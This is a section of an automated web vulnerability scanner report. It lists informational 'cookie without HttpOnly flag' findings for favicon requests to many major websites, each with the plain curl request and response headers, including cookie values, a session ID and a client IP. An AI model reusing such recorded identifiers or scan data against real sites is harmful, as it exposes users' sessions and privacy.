Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.modelmayhem.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 13:34:55 GMT
Content-Type: image/x-icon
Content-Length: 1406
Last-Modified: Tue, 29 Jul 2008 22:05:35 GMT
Connection: keep-alive
Expires: Sun, 03 Apr 2011 13:34:55 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
Set-Cookie: BIGipServermodelmayhem_POOL=1206194348.0.0000; path=/

..............h.......(....... ...........@...............................???.....```..... .........///.............LLL.sss.....WWW.........777.....kkk.........'''.............fff.................++
...[SNIP]...
14.147. http://www.motime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:57:00 GMT
Content-Type: image/x-icon
Content-Length: 3638
Last-Modified: Wed, 30 Mar 2011 10:05:38 GMT
Connection: keep-alive
Set-Cookie: trkdada=x3UsOE2XKyykQj0YA3RgAg==; expires=Sun, 01-Apr-12 13:57:00 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Accept-Ranges: bytes

..............h...&... ..............(....... ...........@...................................fff.............xxx.........................lll...........................................................
...[SNIP]...
14.148. http://www.motortrend.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motortrend.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motortrend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nlyudv55a1nhnnmevhefti2i; path=/; HttpOnly
Set-Cookie: UserPuid=2319845640652462039; domain=motortrend.com; expires=Sat, 02-Apr-2061 13:50:29 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 414

GIF89a.......\~.2Tr.p1...l..g.....KT[MYa...x..........    Zq~.{..c1EGJ...p..:i.j]O.l.y..IYe...}...f..g    ...~..GYfBYkEMSMW_FWf...N[cp.........p...%Rak]..MW`...cCVZ[.........h..UJBn..n..KZdjQ:...<N_IQXu..~
...[SNIP]...
14.149. http://www.mynewplace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynewplace.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mynewplace.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Resin/3.1.7a
P3P: policyref="/w3c/p3p.xml", CP="CURa DEVa TAIa CONo OUR IND DSP CAO COR"
ETag: "82870KToCgf"
Last-Modified: Wed, 30 Mar 2011 18:45:34 GMT
Accept-Ranges: bytes
Content-Length: 1150
Date: Sat, 02 Apr 2011 13:57:13 GMT
Set-Cookie: BIGipServerWEB_APPS_SE=2533425674.37663.0000; path=/
Vary: Accept-Encoding, User-Agent

............ .h.......(....... ..... ...........................................v...............................................................w...........s...e...n...V...............................
...[SNIP]...
14.150. http://www.newegg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newegg.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newegg.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 10 Mar 2009 20:58:45 GMT
ETag: "8b266c0c3a1c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
x-server-id: 111
X-UA-Compatible: IE=7
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:40:38 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:26 GMT;path=/

..............h.......(....... ...............................RRR.skk.................s....................J..c........c...1..............J...R...............B.........................................
...[SNIP]...
14.151. http://www.nintendo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nintendo.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nintendo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:59 GMT
Server: Apache
Set-Cookie: NINTENDO=173.193.214.243.1301753939577074; path=/; expires=Thu, 31-Mar-16 14:18:59 GMT; domain=.nintendo.com
Last-Modified: Wed, 22 Jul 2009 17:26:54 GMT
ETag: "2fe8b-e36-46f4ead643380"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 14:18:59 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONo OTPa OUR SAMa NOR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE OTC", policyref="http://www.nintendo.com/w3c/p3p.xml"
NODE: swebe2
Content-Type: image/x-icon
Set-Cookie: BIGipServerWEB_NINTENDO=2052065290.20480.0000; path=/

..............h...&... ..............(....... ...........@........................oh............................. ........;............................................................................
...[SNIP]...
14.152. http://www.nydailynews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:36 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2007 14:31:37 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=14515200
Expires: Sat, 17 Sep 2011 13:23:36 GMT
Keep-Alive: timeout=3, max=998
Content-Type: image/x-icon
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:17 GMT; Path=/

............ .h.......(....... ..... ............................................................................................&...u...uTT..TT..TT..TT..TT..TT..TT..TT..TT..TT.....u...........2......
...[SNIP]...
14.153. http://www.nymag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nymag.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nymag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 13:32:34 GMT
Server: Apache
Location: http://nymag.com/favicon.ico
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerapache_prod_static_pool=1375802028.20480.0000; path=/
Vary: Accept-Encoding
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://nymag.com/favico
...[SNIP]...
14.154. http://www.nytimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nytimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:13 GMT
Content-length: 1406
Content-type: image/x-icon
Set-cookie: RMID=0e1072ee0fa04d9719e1afa7; expires=Sunday, 01-Apr-2012 12:43:13 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 24 Mar 2008 16:03:01 GMT
Etag: "57e-47e7d0b5"
Accept-ranges: bytes

..............h.......(....... ....................................................................ooo.___.OOO.???.///...............................................................................
...[SNIP]...
14.155. http://www.officedepot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.officedepot.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officedepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 3978
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 13:39:10 GMT
Date: Sat, 02 Apr 2011 13:39:10 GMT
Connection: close
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta h
...[SNIP]...
14.156. http://www.okcupid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okcupid.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okcupid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302
Date: Sat, 02 Apr 2011 13:40:27 GMT
Connection: close
Server: OKWS/3.1.7
Location: http://cdn.okcimg.com/_img/layout2/favicon_new.ico
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="http://www.okcupid.com/w3c/p3p.xml"
Set-Cookie: guest=9282563596558295837; expires=Sun, 01 Apr 2012 13:40:27 GMT; path=/; domain=okcupid.com

14.157. http://www.olivegarden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olivegarden.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.olivegarden.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:52:33 GMT
Content-Type: image/x-icon
ETag: "0f364036e4c71:0"
Set-Cookie: olive=R3372667923; path=/
Last-Modified: Tue, 21 Aug 2007 21:00:06 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

..............h.......(....... ...............#...#................5Q..B\..Of.._t......Wl..l~......}......................................................ftT.........>.....p.f.T.K]....................
...[SNIP]...
14.158. http://www.onemanga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onemanga.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onemanga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 14:06:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: geo_code="178.190.152.95:AT:Austria"; expires=Sun, 03-Apr-2011 14:01:56 GMT; Max-Age=86400; Path=/
Vary: Accept-Encoding
Content-Length: 5622
Age: 291
X-Cache: HIT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
14.159. http://www.openforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.openforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 30 Apr 2010 17:36:50 GMT
Accept-Ranges: bytes
ETag: "6fabdb78be8ca1:2cc5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Sat, 02 Apr 2011 13:39:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:39:34 GMT
Connection: close
Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/

..............h.......(....... ................................_..}..~..~..}..|..z..z..w..x..u..t..r..p..p..q..i...............................~..}..z..x..x..o......................................|.
...[SNIP]...
14.160. http://www.opinionshere.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionshere.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionshere.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: opinions_here=a500242$50$0$6$140b0403$1021b36; Version=1; path=/; expires=Sun, 3-Apr-2011 2:27:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:01:33 GMT
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
14.161. http://www.orbitz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orbitz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 28 Mar 2011 17:17:10 GMT
ETag: "1536-49f8e1d255180"
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 10:25:05 GMT
Content-Type: image/x-icon
Content-Length: 5430
Server: Apache
Date: Sat, 02 Apr 2011 13:33:53 GMT
Age: 11327
Connection: keep-alive
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

............ .h...&... .... .........(....... ..... .....@.....................................................................................U...US..U..U..U..U..U..Uo..UC..U...................
...[SNIP]...
14.162. http://www.orchardbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orchardbank.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orchardbank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:15 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751375.232210; path=/; expires=Tue, 30-Mar-2021 13:36:15 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:15 GMT
Last-modified: Fri, 01 Dec 2006 17:01:18 GMT
Surrogate-control: no-store
Content-language: en
Set-cookie: LASCCSSA2001US_ID=0000VlMnR6z02I0O5AVHxcS5ZLL:15nk4pqmt; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...
14.163. http://www.outdoorchannel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outdoorchannel.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outdoorchannel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/x-icon
Last-Modified: Wed, 02 Jul 2008 20:47:18 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:07:27 GMT
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.outdoorchannel.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=c237f539-f580-4aa1-8e71-f81ce7c34034; expires=Mon, 02-Apr-2012 14:07:27 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:27 GMT; path=/
Content-Length: 1406
Connection: Keep-alive
Via: 1.1 AN-0016020121270012

..............h.......(....... .......................................cbd.....L...............u...324."!#.....@@A.ono.878.AAC.....)().............+.....................................................
...[SNIP]...
14.164. http://www.pbs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pbs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:24 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=92e71d9857c8638d8750a317a271ed51; path=/; domain=.pbs.org
Last-Modified: Thu, 15 Nov 2001 16:43:13 GMT
ETag: "312715-1266-392cefa74aa40"
Accept-Ranges: bytes
Content-Length: 4710
Cache-Control: max-age=10368000
Expires: Sun, 31 Jul 2011 13:35:24 GMT
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@...................................................


.............................$$$.%%%.'''.***.+++.888.<<<.???.DDD.KK
...[SNIP]...
14.165. http://www.peekyou.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peekyou.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peekyou.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
ETag: "1502474026"
Last-Modified: Wed, 16 Sep 2009 14:34:27 GMT
Content-Length: 824
Date: Sat, 02 Apr 2011 14:01:04 GMT
Server: lighttpd/1.4.28
Set-Cookie: BIGipServerstatic_files=1694564362.37151.0000; path=/

BM8.......6...(............................................h..g..g..g..g..g..g..g..g..g..g..g..g..i.....gs..w..}..~..}..~..~...................s....h..kl......l.R..X....^.._.._.._..`..n..r..w....i..
...[SNIP]...
14.166. http://www.peoplelookup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peoplelookup.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peoplelookup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:06 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:33:06 GMT
Cache-Control: public
ETag: 517362157319c18dc38588d213eb5f93004071d8
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-trans=sNP5yw+1/FgqlUufy7qTV8MjXwILd9yCg5LYmkNDfn9g+Q1u/48mAaWTyJDRQ2w82jAxhx4u17Z3Tg==; expires=Sat, 02-Apr-2011 15:03:06 GMT; path=/
Content-Length: 1086

GIF89a...................................j...........p......)..........`..................+....a..................8?.............)....m...,....................'.......`...V..............-.....5..0....
...[SNIP]...
14.167. http://www.pizzahut.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pizzahut.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pizzahut.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 03 Mar 2009 19:15:15 GMT
Accept-Ranges: bytes
ETag: "b14e361349cc91:7d6"
X-Powered-By: ASP.NET
Content-Length: 1150
Cache-Control: max-age=73717
Date: Sat, 02 Apr 2011 13:36:41 GMT
Connection: close
Set-Cookie: WEBTRENDS_ID=6dce8f18f46000006926974d5fc705005eb80000; expires=Thu, 30-Dec-2010 18:50:11 GMT; path=/
Set-Cookie: www-origin=yeti-DC-WASHINGTON-511; path=/; domain=.pizzahut.com
Set-Cookie: www-origin-reset=1; expires=Mon, 02-May-2011 13:36:41 GMT; path=/; domain=.pizzahut.com

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
14.168. http://www.playlist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playlist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 13:28:05 GMT
Content-Type: image/x-icon
Connection: keep-alive
Last-Modified: Wed, 16 Sep 2009 18:33:08 GMT
Accept-Ranges: bytes
Content-Length: 402
Vary: Accept-Encoding
Set-Cookie: nuid=CgABl02XJGVtzVZFFlaZAg==; expires=Sun, 01-Apr-12 13:28:05 GMT; domain=.playlist.com; path=/

.PNG
.
...IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...4IDATx..R;N.0....( .AEI....h)...J:J(h.WBTp..(.h)i..\.%...=L.......O.....x..._b....M..x....:.j..Y+3..r^.~...Y.|{,.PY*4r.L.BH.LI.
...[SNIP]...
14.169. http://www.pnc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pnc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pnc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Location: https://www.pnc.com/favicon.ico
Content-Length: 215
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_q*epuew-w0-mc*80=ffffffffa9c1271e45525d5f4f58455e445a4a422973;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.pnc.com/favicon.ico">here</a>.</p>

...[SNIP]...
14.170. http://www.potterybarn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.potterybarn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1406-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:10 GMT; domain=.potterybarn.com; path=/
